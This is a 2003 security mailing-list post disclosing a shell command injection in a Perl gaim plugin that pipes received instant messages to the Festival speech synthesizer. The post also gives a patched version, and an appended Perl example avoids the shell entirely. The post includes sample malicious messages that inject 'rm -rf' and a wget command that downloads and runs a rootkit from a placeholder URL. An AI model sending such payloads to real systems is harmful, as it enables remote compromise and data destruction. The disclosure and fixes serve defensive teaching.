Gaim festival plugin exploit

From: error (error_at_lostinthenoise.net)
Date: 10/15/03

    To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com
    Date: 15 Oct 2003 17:29:55 +0200
    
    
    

    It has come to my attention that people have actually used this example
    code for a gaim plugin:

    AIM::register("Festival TTS", "0.0.1", "goodbye", "");
    AIM::print("Perl Says", "Loaded Festival TTS");
    AIM::command("idle", "60000") if ($pro ne "Offline");
    AIM::add_event_handler("event_im_recv", "synthesize");

    sub goodbye {
            AIM::print("Module Unloaded", "Unloaded Festival TTS");
    }

    sub synthesize {
        my $string = $_[0];
        $string =~ s/\<.*?\>//g;
        $string =~ s/\".*\"//;
        system("echo \"$string\" | /usr/bin/festival --tts");
    }

    As taken from:
    http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl

    This has to be one of the most amusing ways to gain a local user's
    privileges I have ever seen by an "Expert (TM)".

    Exploit code?
    You have a shell through gaim with that.

    Just pass it this message (or really any message for that matter):

    Hey, I just wanted to exploit your box, do you mind?"; rm -rf;

    Or perhaps:

    Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x
    rootkit;./rootkit

    Perhaps someone should ask:

    "(Is s/[^\w]//g really that hard to do?!)"

    So a fixed version would look like this:

    AIM::register("Festival TTS", "0.0.1", "goodbye", "");
    AIM::print("Perl Says", "Loaded Festival TTS");
    AIM::command("idle", "60000") if ($pro ne "Offline");
    AIM::add_event_handler("event_im_recv", "synthesize");

    sub goodbye {
            AIM::print("Module Unloaded", "Unloaded Festival TTS");
    }

    sub synthesize {
        my $string = $_[0];
        $string =~ s/\<.*?\>//g;
        $string =~ s/\".*\"//;
        $string =~ s/[^\w]//g;
        system("echo \"$string\" | /usr/bin/festival --tts");
    }

    Just a minor comment, nothing special.

    -- 
    error <error@lostinthenoise.net>
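
An added example, not part of the original post or of the webreference tutorial: a variant of `synthesize` that hands the message to festival on stdin through the list form of Perl's `open`, so no shell ever parses the text. The helper names `clean_text` and `speak`, and the `/bin/cat` stand-in used for the standalone demonstration, are assumptions made for this example.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumption: festival is installed at the path used by the plugin above.
my @TTS_CMD = ('/usr/bin/festival', '--tts');

# Tidy the text for speech: drop markup and non-printable bytes but keep
# spaces and punctuation. This is cosmetic, not the security boundary.
sub clean_text {
    my ($text) = @_;
    $text =~ s/<[^>]*>//g;          # HTML tags sent by AIM clients
    $text =~ s/[^[:print:]\s]//g;   # control and other non-printable bytes
    $text =~ s/\s+/ /g;             # collapse newlines and runs of blanks
    return $text;
}

# Write the text to the command's stdin. With a multi-element list, open()
# execs the program directly with that argument vector, so quotes,
# semicolons and backticks in $text are never interpreted by /bin/sh.
sub speak {
    my ($text, @cmd) = @_;
    @cmd = @TTS_CMD unless @cmd;
    local $SIG{PIPE} = 'IGNORE';    # do not die if the child exits early
    open(my $pipe, '|-', @cmd)
        or do { warn "cannot run $cmd[0]: $!\n"; return 0 };
    print {$pipe} clean_text($text), "\n";
    return close($pipe) ? 1 : 0;
}

# Replacement for the plugin's event handler; the message is in $_[0].
sub synthesize { speak($_[0]) }

# Constructed sample message containing a quote and shell metacharacters.
# Run standalone, it is piped to "/bin/cat -" in place of festival to show
# that the whole string arrives as plain text.
unless (caller) {
    my $sample = qq{<b>hello</b> there"; echo injected; "};
    speak($sample, '/bin/cat', '-');
}
```

Because the command and its arguments are fixed and the message only ever travels over the pipe, the handler no longer depends on a character filter being complete.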
    
    


